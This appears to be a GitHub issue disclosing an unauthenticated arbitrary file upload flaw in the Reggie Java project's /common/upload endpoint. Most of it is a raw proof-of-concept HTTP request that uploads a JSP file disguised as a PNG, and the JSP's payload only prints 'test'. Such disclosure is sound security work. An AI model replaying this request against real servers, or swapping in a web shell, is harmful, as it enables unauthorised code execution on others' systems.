Reggie has any file uploaded #2

LvZCh opened this issue Jan 2, 2025 · 0 comments
LvZCh commented Jan 2, 2025

Vulnerability details:
The upload method in src/main/java/com/itheima/reggie/controller/CommonController.java only performs front-end validation on file suffixes, allowing attackers to directly upload any file.
No login required, send data packet directly:

POST /common/upload HTTP/1.1
Host: 192.168.0.102:8080
Content-Length: 205
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryceM71QQd51Bajo9H
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryceM71QQd51Bajo9H
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: image/png

<% out.println("test"); %>
------WebKitFormBoundaryceM71QQd51Bajo9H--
